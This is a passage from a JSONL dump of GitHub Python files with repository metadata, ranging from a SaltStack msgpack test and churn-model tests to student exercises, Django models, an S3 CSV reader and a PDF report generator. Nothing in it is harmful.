functions.append(\n {\"pack_func\": salt.utils.msgpack.dumps, \"unpack_func\": msgpack.unpackb}\n )\n if salt.utils.msgpack.loads is not salt.utils.msgpack.unpackb:\n functions.append(\n {\"pack_func\": msgpack.packb, \"unpack_func\": salt.utils.msgpack.loads}\n )\n\n test_funcs = (\n self._test_base,\n self._test_unpack_array_header_from_file,\n self._test_unpacker_hook_refcnt,\n self._test_unpacker_ext_hook,\n self._test_pack_unicode,\n self._test_pack_bytes,\n self._test_pack_byte_arrays,\n self._test_ignore_unicode_errors,\n self._test_strict_unicode_unpack,\n self._test_ignore_errors_pack,\n self._test_decode_binary,\n self._test_pack_float,\n self._test_odict,\n self._test_pair_list,\n self._test_get_buffer,\n )\n errors = {}\n for test_func in test_funcs:\n # Run the test without the salt.utils.msgpack module for comparison\n vanilla_run = self.no_fail_run(\n test_func,\n **{\"pack_func\": msgpack.packb, \"unpack_func\": msgpack.unpackb}\n )\n\n for func_args in functions:\n func_name = (\n func_args[\"pack_func\"]\n if func_args[\"pack_func\"].__module__.startswith(\"salt.utils\")\n else func_args[\"unpack_func\"]\n )\n if hasattr(TestCase, \"subTest\"):\n with self.subTest(test=test_func.__name__, func=func_name.__name__):\n # Run the test with the salt.utils.msgpack module\n run = self.no_fail_run(test_func, **func_args)\n # If the vanilla msgpack module errored, then skip if we got the same error\n if run:\n if str(vanilla_run) == str(run):\n self.skipTest(\n \"Failed the same way as the vanilla msgpack\"\n \" module:\\n{}\".format(run)\n )\n else:\n # If subTest isn't available then run the tests collect the errors of all the tests before failing\n run = self.no_fail_run(test_func, **func_args)\n if run:\n # If the vanilla msgpack module errored, then skip if we got the same error\n if str(vanilla_run) == 
str(run):\n self.skipTest(\n \"Test failed the same way the vanilla msgpack module\"\n \" fails:\\n{}\".format(run)\n )\n else:\n errors[(test_func.__name__, func_name.__name__)] = run\n\n if errors:\n self.fail(pprint.pformat(errors))\n","repo_name":"saltstack/salt","sub_path":"tests/unit/utils/test_msgpack.py","file_name":"test_msgpack.py","file_ext":"py","file_size_in_byte":17629,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"} +{"seq_id":"26013837972","text":"#Initialize progrom\ncourses_string = \"\"\nstudents = []\ncourses = ['english', 'math','history']\ngrades_english = {}.fromkeys(students,) #Create a dict\ngrades_math = {}.fromkeys(students,)\ngrades_history = {}.fromkeys(students,)\n\n#Combine al grades in another dictionary\ngrades = {courses[0] : grades_english , courses[1] : grades_math, courses[2] : grades_history}\n\ncontinueFlag = 1\ncourses_amount = len(courses)\n\n#We want to transform the list containing the cources into a proper string so it can be printed.\nfor i in range(courses_amount):\n courses_string += courses[i].capitalize()\n if i < (courses_amount - 2):\n courses_string += \", \"\n elif i == (courses_amount - 2):\n courses_string += \" and \"\n\n\nwhile continueFlag:\n\n #Ask for name\n name = input(\"What is the student's name? \")\n\n #Ask for course and determine whether it exists\n chooseCourse = 1\n while chooseCourse:\n course = input(\"What is the course? Choose from: {} \".format(courses_string))\n course = course.lower() #Convert to lower case to make case insensitive\n if (course in str(courses)):\n chooseCourse = 0\n else :\n print(\"{} is not an available course, please select another one\".format(course))\n chooseCourse = 1\n\n grade = input(\"What was his/her grade? \")\n\n #Allow the user to check wether it's input was coorect\n saveInputString = input(\"Is it true that {0} had an {1} for {2}? [Y/N]\".format(name, grade, course, format_spec='{2}'))\n saveInputString = saveInputString.lower() #Convert to lower case to make case insensitive\n if saveInputString == 'y':\n saveInput = True\n elif saveInputString == 'n':\n saveInput = False\n elif saveInputString == 'n':\n saveInput = False\n\n #Save input if desired\n if saveInput:\n for i in range(courses_amount):\n if course == courses[i]:\n grades[courses[i]][name] = grade\n students.append(name)\n\n #Display the grades which have been inserted in a nice way\n for courseName in grades:\n print(courseName)\n for student in grades[courseName]:\n print('-',student, ':', grades[courseName][student])\n\n #Ask the user if he/she want to continue and set flag acordingly\n continueInput = input(\"Do you want to continue? 
(Y/N)\")\n if continueInput == 'Y' or continueInput == 'y':\n continueFlag = 1\n else:\n continueFlag = 0","repo_name":"dtbinh/TI3105TU","sub_path":"week-2/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70759874811","text":"from profession import Profession\n\n\nclass Medical(Profession):\n\n def __init__(self, name: str):\n super().__init__(name, regulated_profession=True)\n self._med_level = \"None\"\n self.__work_in_hospital = None\n\n def change_med_level(self):\n \"\"\"\n Function changes med level from 3 options\n :return:\n \"\"\"\n user_level = input(\n \"Нажмите 1, если необходимо присвоить высший уровень, нажмите 2, если средний и 3 - если младший: \")\n if user_level == \"1\":\n self._med_level = \"high\"\n elif user_level == \"2\":\n self._med_level = \"middle\"\n else:\n self._med_level = \"low\"\n\n def show_med_level(self):\n \"\"\"\n Function shows current medical level\n \"\"\"\n return self._med_level\n\n\nif __name__ == '__main__':\n dentist = Medical(\"dentist\")\n dentist.change_med_level()\n print(dentist.show_med_level())\n","repo_name":"MariiaDo/basic-python","sub_path":"OOP_classes/medical.py","file_name":"medical.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34154959013","text":"import rldev\n\nimport numpy as np\n\nfrom .geo import State\n\n\n\nclass VehicleControl(object):\n def __init__(self, acc, steer):\n self.acc = acc\n self.steer = steer\n\n\n\nclass BicycleModel(object):\n def __init__(self, config, dt):\n self.min_velocity = config.min_velocity\n self.max_velocity = config.max_velocity\n self.max_acceleration = config.max_acceleration\n self.min_acceleration = config.min_acceleration\n self.max_steer = config.max_steer\n self.wheelbase = config.wheelbase\n self.max_curvature = np.tan(self.max_steer) / self.wheelbase\n self.dt = dt\n \n\n def __call__(self, *args, **kwargs):\n return self.forward(*args, **kwargs)\n\n\n def forward(self, state: State, action: VehicleControl):\n acc = np.clip(action.acc, self.min_acceleration, self.max_acceleration)\n steer = np.clip(action.steer, -self.max_steer, self.max_steer)\n\n x, y, theta, v = state.x, state.y, state.theta, state.v\n next_state = State(\n x=x + self.dt *v * np.cos(theta),\n y=y + self.dt *v * np.sin(theta),\n theta=rldev.pi2pi_numpy(theta + self.dt * v * np.tan(steer) / self.wheelbase),\n v=np.clip(v + self.dt *acc, self.min_velocity, self.max_velocity),\n )\n return next_state\n\n\n","repo_name":"alibaba-damo-academy/universe","sub_path":"universe/common/vehicle_model.py","file_name":"vehicle_model.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"13208959215","text":"\"\"\"\nScript Description: Test and monitor churn.library.py\nName: Zhahan Sun\nDate: Jun 3\n\"\"\"\nimport os\nimport logging\nimport churn_library as cl\nimport joblib\n\nlogging.basicConfig(\n filename='./logs/churn_library.log',\n level = logging.INFO,\n filemode='w',\n format='%(name)s - %(levelname)s - %(message)s')\n\ndef test_import(import_data):\n\t'''\n\ttest data import \n\t'''\n\ttry:\n\t\tdf = import_data(\"./data/bank_data.csv\")\n\t\tlogging.info(\"Testing import_data: SUCCESS\")\n\texcept FileNotFoundError as err:\n\t\tlogging.error(\"Testing import_eda: The file wasn't 
found\")\n\t\traise err\n\n\ttry:\n\t\tassert df.shape[0] > 0\n\t\tassert df.shape[1] > 0\n\texcept AssertionError as err:\n\t\tlogging.error(\"Testing import_data: The file doesn't appear to have rows and columns\")\n\t\traise err\n\n\n\ndef test_eda(import_data, perform_eda):\n\t'''\n\ttest perform eda function\n\t'''\n\n\tdf = import_data(\"./data/bank_data.csv\")\n\tperform_eda(df)\n\tpth_churn = './images/eda/churn_distribution.png'\n\tpth_age = './images/eda/customer_age_distribution.png'\n\tpth_heatmap = './images/eda/heatmap.png'\n\tpth_marital = './images/eda/marital_status_distribution.png'\n\tpth_transaction = './images/eda/total_transaction_distribution.png'\n\n\ttry:\n\t\tassert os.path.exists(pth_churn) == True and os.path.getsize(pth_churn) > 0\n\t\tlogging.info(\"Check churn_distribution.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check churn_distribution.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_age) == True and os.path.getsize(pth_age) > 0\n\t\tlogging.info(\"Check customer_age_distribution.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check customer_age_distribution.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_heatmap) == True and os.path.getsize(pth_heatmap) > 0\n\t\tlogging.info(\"Check heatmap.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check heatmap.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_marital) == True and os.path.getsize(pth_marital) > 0\n\t\tlogging.info(\"Check marital_status_distribution.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check marital_status_distribution.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_transaction) == True and os.path.getsize(pth_transaction) > 0\n\t\tlogging.info(\"Check total_transaction_distribution.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check total_transaction_distribution.png: The file wasn't found\")\n\t\traise err\n\n\ndef test_encoder_helper(import_data, encoder_helper):\n\t'''\n\ttest encoder helper\n\t'''\n\tdf = import_data(\"./data/bank_data.csv\")\n\tcategories = ['Gender', 'Education_Level', 'Marital_Status', 'Income_Category', 'Card_Category']\n\tresponseName = 'Churn'\n\tencoded_df = encoder_helper(df, categories, responseName)\n\n\ttry:\n\t\tassert encoded_df.shape[0] > 0\n\t\tassert encoded_df.shape[1] > 0\n\t\tlogging.info('encoded df dimension correct.')\n\texcept AssertionError as err:\n\t\tlogging.error(\"Testing test_encoder_helper: The file doesn't appear to have rows and columns\")\n\t\traise err\n\ndef test_perform_feature_engineering(import_data, encoder_helper, \n\t perform_feature_engineering):\n\t'''\n\ttest perform_feature_engineering\n\t'''\n\tdf = import_data(\"./data/bank_data.csv\")\n\tcategories = ['Gender', 'Education_Level', 'Marital_Status', 'Income_Category', 'Card_Category']\n\tresponseName = 'Churn'\n\n\tdf = encoder_helper(df, categories, responseName)\n\tmp = perform_feature_engineering(df, responseName)\n\ttry:\n\t\tassert mp['X_train'].shape[0] > 0\n\t\tassert mp['X_train'].shape[1] > 0\n\t\tassert mp['X_test'].shape[0] > 0\n\t\tassert mp['X_test'].shape[1] > 0\n\t\tassert mp['y_train'].size > 0\n\t\tassert mp['y_test'].size > 0\n\t\tlogging.info(\"Testing perform_feature_engineering: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Testing perform_feature_engineering: 
failed\")\n\t\traise err\n\n\ndef test_train_models(import_data, encoder_helper,\n perform_feature_engineering,\n classification_report_image,\n feature_importance_plot,\n\t train_models):\n\t'''\n\ttest train_models\n\t'''\n\tdf = import_data(\"./data/bank_data.csv\")\n\tcategories = ['Gender', 'Education_Level', 'Marital_Status', 'Income_Category', 'Card_Category']\n\tresponseName = 'Churn'\n\n\tdf = encoder_helper(df, categories, responseName)\n\tmp = perform_feature_engineering(df, responseName)\n \n\tX_train, X_test, y_train, y_test = mp['X_train'], mp['X_test'], mp['y_train'], mp['y_test']\n\ttrain_models(X_train, X_test, y_train, y_test)\n\trfc_model = joblib.load('./models/rfc_model.pkl')\n\tlr_model = joblib.load('./models/logistic_model.pkl')\n\ty_train_preds_rf = rfc_model.predict(X_train)\n\ty_test_preds_rf = rfc_model.predict(X_test)\n\ty_train_preds_lr = lr_model.predict(X_train)\n\ty_test_preds_lr = lr_model.predict(X_test)\n\n\tclassification_report_image(y_train,y_test,y_train_preds_lr,y_train_preds_rf,y_test_preds_lr,y_test_preds_rf)\n\tpth_feat = './images/results/feature_importances.png'\n\tfeature_importance_plot(rfc_model, mp['X'], pth_feat)\n\n\tpth_rf_res = './images/results/rf_results.png'\n\tpth_logistic_res = './images/results/logistic_results.png'\n\tpth_roc_auc = './images/results/roc_curve_result.png'\n\ttry:\n\t\tassert os.path.exists(pth_feat) == True and os.path.getsize(pth_feat) > 0\n\t\tlogging.info(\"Check feature_importance.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check feature_importance.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_rf_res) == True and os.path.getsize(pth_rf_res) > 0\n\t\tlogging.info(\"Check rf_results.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check rf_results.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_logistic_res) == True and os.path.getsize(pth_logistic_res) > 0\n\t\tlogging.info(\"Check logistic_results.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check logistic_results.png: The file wasn't found\")\n\t\traise err\n\n\ttry:\n\t\tassert os.path.exists(pth_roc_auc) == True and os.path.getsize(pth_roc_auc) > 0\n\t\tlogging.info(\"Check roc_auc_result.png: SUCCESS\")\n\texcept AssertionError as err:\n\t\tlogging.error(\"Check roc_auc_result.png: The file wasn't found\")\n\t\traise err\n\n\n\nif __name__ == \"__main__\":\n\ttest_import(cl.import_data)\n\ttest_eda(cl.import_data, cl.perform_eda)\n\ttest_encoder_helper(cl.import_data, cl.encoder_helper)\n\ttest_perform_feature_engineering(cl.import_data, cl.encoder_helper, cl.perform_feature_engineering)\n\ttest_train_models(cl.import_data, cl.encoder_helper,\n cl.perform_feature_engineering,\n cl.classification_report_image,\n cl.feature_importance_plot,\n\t cl.train_models)\n\n\n\n\n\n\n\n\n\n","repo_name":"zsun316/Predict-Customer-Churn","sub_path":"churn_script_logging_and_tests.py","file_name":"churn_script_logging_and_tests.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18836563022","text":"class Nodo_dron:\n def __init__(self, nombre = None, tipo = None, capacidad = None, siguiente = None):\n self.nombre = nombre\n self.tipo = tipo\n self.capacidad = capacidad\n self.siguiente = siguiente\n\nclass Nuevo_nodo_dron:\n def __init__(self):\n self.raiz = Nodo_dron()\n self.ultimo = Nodo_dron()\n\n def insertar(self, 
nuevoNodo):\n if self.raiz.nombre == None:\n self.raiz = nuevoNodo\n self.ultimo = nuevoNodo\n\n elif self.raiz.siguiente == None:\n self.raiz.siguiente = nuevoNodo\n self.ultimo = nuevoNodo\n else:\n self.ultimo.siguiente = nuevoNodo\n self.ultimo = nuevoNodo\n\n def imprimir(self, variable):\n aux = self.raiz\n\n while aux != None:\n if variable != \"ChapinRescue\":\n if aux.tipo != \"ChapinRescue\":\n print(\"Nombre:\",aux.nombre,\" Tipo:\",aux.tipo,\" Capacidad:\",aux.capacidad) \n aux = aux.siguiente\n else:\n aux = aux.siguiente\n\n else:\n if aux.tipo == \"ChapinRescue\":\n print(\"Nombre:\",aux.nombre,\" Tipo:\",aux.tipo) \n aux = aux.siguiente\n\n else:\n aux = aux.siguiente\n\n\n def buscar(self, nombre):\n try:\n aux = self.raiz\n while aux != None:\n if aux.nombre == nombre:\n return aux\n aux = aux.siguiente\n return False\n except:\n return False\n\n def editar(self, nombre, tipo, capacidad):\n aux = self.raiz\n while aux != None:\n if aux.nombre == nombre:\n aux.tipo = tipo\n aux.capacidad = capacidad \n return True\n aux = aux.siguiente\n return False\n def verificar(self):\n try:\n aux = self.raiz\n while aux != None:\n if aux.tipo== \"ChapinRescue\":\n return True\n aux = aux.siguiente\n return False\n except:\n return False\n\n def verificar_tipo(self):\n try:\n aux = self.raiz\n while aux != None:\n if aux.tipo == \"ChapinFighter\":\n return True\n aux = aux.siguiente\n return False\n except:\n return False","repo_name":"JavierGD15/IPC2_Proyecto2_-202000510","sub_path":"robots.py","file_name":"robots.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2812978086","text":"'''Setter Decorator - @name.setter\nGenerally, getter and setter are used simultaneously.\n@property - for an attribute.\n@NAME.setter - uses the same function for which @property was used, to set its value as constant'''\n\n\n# This will show why we need to use property decorator and setter decorator.\nclass Employee:\n name = \"Bharat Gas\"\n salary = 5600\n salaryBonus = 500\n salaryTotal = salary + salaryBonus\n \ne1= Employee()\nprint(e1.salary) # 5600\nprint(e1.salaryTotal) # 6100\nEmployee.salaryBonus = 400\ne2= Employee() \nprint(e2.salaryBonus) # 400\nprint(e2.salaryTotal) # 6100\n\n# NOTE - So from the above example it's clear that salaryTotal is computed only once as it is a class variable and although salaryBonus which is a class variable is changed using Employee.salaryBonus = 400, then also it's not changed.\n# NOTE - So, we can't have variables which are dynamic as class variable or instance variable in constructor but we can have them as instance variable in some class method/function or if we want it to be a property/attribute than we can use property decorator.\n\n# Example for setter.\nclass Employee:\n name = \"Bharat Gas\"\n salary = 5600\n salaryBonus = 500\n # salaryTotal = 6100 #We don't want it to be permanent.\n \n def ChangeSalaryBonus(self, bonus):\n self.__class__.salaryBonus = bonus\n print(self.salaryBonus)\n \n @property #Makes totalSalary an attribute.\n def totalSalary(self):\n return self.salary + self.salaryBonus\n # Here, it is GETTING the value of totalSalary on the basis of salary and bonus. 
\n \n @totalSalary.setter #Used on same function, Uses totalSalary as an attribute whose value is fixed(set).\n def totalSalary(self, val): # val contains the value of totalSalary.\n self.salaryBonus = val - self.salary\n \ne = Employee()\nprint(e.salary) \nprint(e.salaryBonus)\nprint(e.totalSalary)\ne.ChangeSalaryBonus(400)\nprint(e.totalSalary)\ne.totalSalary = 5800\nprint(e.totalSalary)\nprint(e.salary)\nprint(e.salaryBonus)\n\n'''OUTPUT'''\n# 5600\n# 500\n# 6100\n# 400\n# 6000\n# 5800\n# 5600\n# 200","repo_name":"MayankGupta-dev08/My-Python-work","sub_path":"85_setter Decorator.py","file_name":"85_setter Decorator.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"41213922452","text":"class MyCalendarThree:\n\n def __init__(self):\n self.array=[]\n \n \n\n def book(self, start: int, end: int) -> int:\n i=bisect.bisect_left(self.array,(start,1))\n self.array.insert(i,(start,1))\n j=bisect.bisect_left(self.array,(start,1))\n self.array.insert(j,(end,-1))\n self.array.sort()\n maxi=0\n count=0\n for pair in self.array:\n count+=pair[1]\n maxi=max(maxi,count)\n return maxi\n \n \n \n\n\n# Your MyCalendarThree object will be instantiated and called as such:\n# obj = MyCalendarThree()\n# param_1 = obj.book(start,end)","repo_name":"jaswanthKumarchapiri2000/coding","sub_path":"0732-my-calendar-iii/0732-my-calendar-iii.py","file_name":"0732-my-calendar-iii.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41563592793","text":"import uuid\n\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass BaseUserData(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n\n firstname = models.CharField(_(\"first name\"), max_length=30, blank=True, default=\"\")\n lastname = models.CharField(_(\"last name\"), max_length=150, blank=True, default=\"\")\n\n phone = models.CharField(max_length=255, verbose_name=_(\"Phone\"))\n email = models.EmailField(max_length=255, verbose_name=_(\"Email\"))\n address = models.CharField(max_length=255, verbose_name=_(\"Address\"))\n gender = models.CharField(_(\"Gender\"), max_length=255, default=\"male\")\n\n avatar = models.ImageField(\n upload_to=\"avatars/\", verbose_name=_(\"Avatar\"), blank=True\n )\n\n class Meta:\n abstract = True\n\n\nclass Teacher(BaseUserData, models.Model):\n students = models.ManyToManyField(\"Student\", related_name=\"teachers\", blank=True)\n\n def __str__(self):\n return f\"{self.firstname} {self.lastname}\"\n\n\nclass Parent(BaseUserData, models.Model):\n def __str__(self):\n return f\"{self.firstname} {self.lastname}\"\n\n\nclass Class(models.Model):\n name = models.CharField(max_length=255, verbose_name=_(\"Name\"))\n description = models.TextField(verbose_name=_(\"Description\"))\n teacher = models.ForeignKey(\n Teacher, on_delete=models.CASCADE, related_name=\"classes\"\n )\n students = models.ManyToManyField(\"Student\", related_name=\"classes\", blank=True)\n\n def __str__(self):\n return self.name\n\n\nclass Student(BaseUserData, models.Model):\n parent = models.ForeignKey(\n \"Parent\", related_name=\"students\", blank=True, on_delete=models.CASCADE\n )\n\n def __str__(self):\n return f\"{self.firstname} {self.lastname}\"\n\n\nclass User(BaseUserData, 
AbstractUser):\n \"\"\"\n Default custom user model for Coachify.\n If adding fields that need to be filled at user signup,\n check forms.SignupForm and forms.SocialSignupForms accordingly.\n \"\"\"\n\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n\n email = models.EmailField(\n _(\"email address\"),\n unique=True,\n error_messages={\n \"unique\": _(\"A user with that email already exists.\"),\n },\n )\n USERNAME_FIELD = \"email\"\n REQUIRED_FIELDS = [\"username\"]\n teachers = models.ManyToManyField(Teacher, related_name=\"principal\", blank=True)\n\n def get_absolute_url(self):\n \"\"\"Get url for user's detail view.\n\n Returns:\n str: URL for user detail.\n\n \"\"\"\n return reverse(\"users:detail\", kwargs={\"username\": self.username})\n","repo_name":"Manjit2003/coachify-backend","sub_path":"coachify/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19208000778","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n def backtracking(inset: List[int], nums: List[int]) -> None:\n for i, n in enumerate(nums):\n nums[0], nums[i] = nums[i], nums[0]\n if inset and n > inset[-1] or not inset:\n answer.append(inset + [n])\n backtracking(inset + [n], nums[1:])\n \n answer = [[],]\n backtracking([], nums)\n return answer\n \n","repo_name":"michaelhuo/pcp","sub_path":"78.py","file_name":"78.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31505811974","text":"from pathlib import Path\nimport imageio\nimport argparse\n\n\nclass GIFGenerator:\n def __init__(self, img_folder, out_gif):\n self.img_folder = Path(img_folder)\n self.out_gif = out_gif\n\n def act(self, var_dict=None):\n files = sorted(self.img_folder.glob('*.png'))\n images = []\n for file in files:\n images.append(imageio.imread(file))\n imageio.mimsave(self.out_gif, images)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('img_folder', type=str)\n parser.add_argument('out_gif', type=str)\n args = parser.parse_args()\n\n GIFGenerator(args.img_folder, args.out_gif).act()\n","repo_name":"lingxiaoli94/POL","sub_path":"pol/utils/validation/gif_generator.py","file_name":"gif_generator.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"34069061802","text":"# # question17 of doc--he/she can vote or not.\n# def vote():\n# age=int(input(\"please enter age:\"))\n# if age>=18:\n# print(\"eligible for voting.\")\n# else:\n# print(\"not eligible.\")\n# vote()\n\ndef func(x=1, y=2):\n x=x+y\n y+=1\n print(x,y)\nfunc(y=2, x=1)","repo_name":"kirtigullaiya/Function","sub_path":"ready to vote or not.py","file_name":"ready to vote or not.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38076201471","text":"import boto3\nfrom datetime import datetime as dt\nimport pandas as pd\n\nSEPERATOR = '/'\n\n\nclass TableNotFoundError (Exception):\n pass\n\n\nclass EmptyBucketError (Exception):\n pass\n\n\nclass BucketNotFoundError (Exception):\n pass\n\n\ndef get_ingestion_bucket_name():\n '''\n Returns:\n The timestamped ingestion bucket name containing our raw CSV\n '''\n ingestion_bucket_name = 
'terrific-totes-ingestion-bucket'\n ingestion_bucket_ts = get_timestamped_bucket_name(ingestion_bucket_name)\n return ingestion_bucket_ts\n\n\ndef get_parquet_bucket_name():\n '''\n Returns:\n The timestamped name of the bucket containing our parquet data\n '''\n processed_bucket_name = 'terrific-totes-processed-bucket'\n processed_bucket_ts = get_timestamped_bucket_name(processed_bucket_name)\n return processed_bucket_ts\n\n\ndef get_tables():\n ''' Used to collect a sorted list of tables, with the newest\n entries first.\n\n Args:\n get_ingestion_bucket_name - A function which returns the name of\n the ingestion bucket.\n\n Returns:\n tables: A list of table names - sorted by timestamp.\n '''\n\n bucket_name = get_ingestion_bucket_name()\n s3 = boto3.client('s3')\n\n try:\n list_tables_response = s3.list_objects(\n Bucket=bucket_name\n )\n except s3.exceptions.NoSuchBucket:\n raise BucketNotFoundError(bucket_name)\n\n # The bucket is empty because it has no contents\n if 'Contents' not in list_tables_response:\n raise EmptyBucketError(list_tables_response['Name'])\n\n # The names of the table\n tables = [table['Key'] for table in list_tables_response['Contents']]\n\n def get_key_timestamp(key):\n split = key.split(SEPERATOR)\n timestamp_str = split[0]\n return dt.fromisoformat(timestamp_str).timestamp()\n\n \"\"\"\n Note: Reverse ordering is set to true as this puts the\n most recent tables first.\n \"\"\"\n tables.sort(key=get_key_timestamp, reverse=True)\n return tables\n\n\ndef get_most_recent_table(table_name):\n '''\n Used to get the S3 name most recently updated version of a table,\n if for example we have 4 versions of staff.csv, this\n will return the newest one.\n\n Args:\n table_name - The name of the CSV file\n\n Returns:\n The most recent table name\n\n Throws:\n TableNotFoundError - when the table does not exist\n '''\n\n try:\n tables = get_tables()\n except EmptyBucketError:\n raise TableNotFoundError(table_name)\n\n for table in tables:\n if table.endswith(table_name):\n return table\n\n raise TableNotFoundError(table_name)\n\n\ndef read_table(table_name):\n '''\n Will return the contents of the most recent table\n packaged in a dictionary\n\n Args:\n table_name - the name of the table\n\n Returns\n A dictionary of form:\n - name: The name of the table (timestamped)\n - body: The CSV contents of the table as a string\n '''\n s3_client = boto3.client('s3')\n ingestion_bucket = get_ingestion_bucket_name()\n key = get_most_recent_table(table_name)\n\n response = s3_client.get_object(\n Bucket=ingestion_bucket,\n Key=key\n )\n\n dataframe = pd.read_csv(response['Body'])\n timestamp = dt.fromisoformat(key.split(SEPERATOR)[0])\n\n return {\n 'Name': table_name,\n 'Timestamp': timestamp,\n 'Key': key,\n 'Body': dataframe\n }\n\n\ndef get_timestamped_bucket_name(bucket_name):\n '''\n As our bucket names are time-stamped, we use this to find\n the correct bucket without specifying exactly when it was created.\n\n Args:\n bucket_name - the non-timestamped name of the bucket:\n example: terrific-totes-ingestion-bucket\n\n Returns:\n The timestamped bucket name, for example:\n terrific-totes-ingestion-bucket20230725102602583400000001\n\n Throws:\n BucketNotFoundError - when the bucket does not exist\n '''\n\n for bucket in boto3.client(\"s3\").list_buckets().get(\"Buckets\"):\n if bucket[\"Name\"].startswith(bucket_name):\n return bucket[\"Name\"]\n\n # The bucket does not exist.\n raise 
BucketNotFoundError(bucket_name)\n","repo_name":"robbfox/totesys","sub_path":"src/lambda_transformation/utils/get_tables.py","file_name":"get_tables.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70017601852","text":"from reportlab.lib.pagesizes import letter\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.utils import ImageReader\nfrom reportlab.pdfgen.canvas import Canvas\nimport calcsum\ndef create_pdf_with_image_and_sum(image_path, pdf_path, image_size, amount,amout_wats):\n c = Canvas(pdf_path, pagesize=letter)\n\n img = ImageReader(image_path)\n\n img_width, img_height = img.getSize()\n aspect_ratio = img_height / float(img_width)\n img_width = image_size * inch\n img_height = img_width * aspect_ratio\n x = 0.5 * (letter[0] - img_width)\n y = 0.5 * (letter[1] - img_height)\n\n c.drawImage(image_path, x, y + inch + 0.5 * inch, img_width, img_height)\n\n c.setFont('Helvetica', 20)\n c.drawCentredString(letter[0] / 2.0, letter[1] - inch, \"Document for the payment period\")\n\n c.setFont('Helvetica', 18)\n c.drawString(inch, inch * 4, f'Total powur usage for month: {round(amount,2)} W/h')\n c.drawString(inch, inch * 4.5, f'Total cost for month: {round(amout_wats,2)} Rub')\n\n c.setFont('Helvetica', 20)\n c.drawCentredString(letter[0] / 2.0 , letter[1] - 2.5 * inch + 0.5 * inch, f'Grapg of usage')\n\n c.showPage()\n c.save()","repo_name":"Qyeler/NTO_BattleStar","sub_path":"doPdf.py","file_name":"doPdf.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22348043231","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: sivnerof\n\nSee PDF in containing folder for problem set requirements\n\"\"\"\n\n\nannual_salary = float(input('Annual Salary: '))\nportion_saved = float(input('Percentage To Be Saved As Decimal: '))\ntotal_cost = float(input('Cost of your dream home: '))\nsemi_annual_raise = float(input('Semi annual raise, as decimal: '))\n\nportion_down_payment = 0.25\ncurrent_savings = 0\nreturn_on_investment = 0.04\n\ngoal = portion_down_payment * total_cost\nmonth = 0\n\n\nwhile current_savings < goal:\n month += 1\n if month % 6 == 0:\n annual_salary += annual_salary * semi_annual_raise \n current_savings += portion_saved * (annual_salary / 12) + current_savings * return_on_investment / 12\n\nprint(f'{month} months')","repo_name":"Sivnerof/6.00.1x","sub_path":"Problem-Set_1/ps1b.py","file_name":"ps1b.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"606906403","text":"# The prime factors of 13195 are 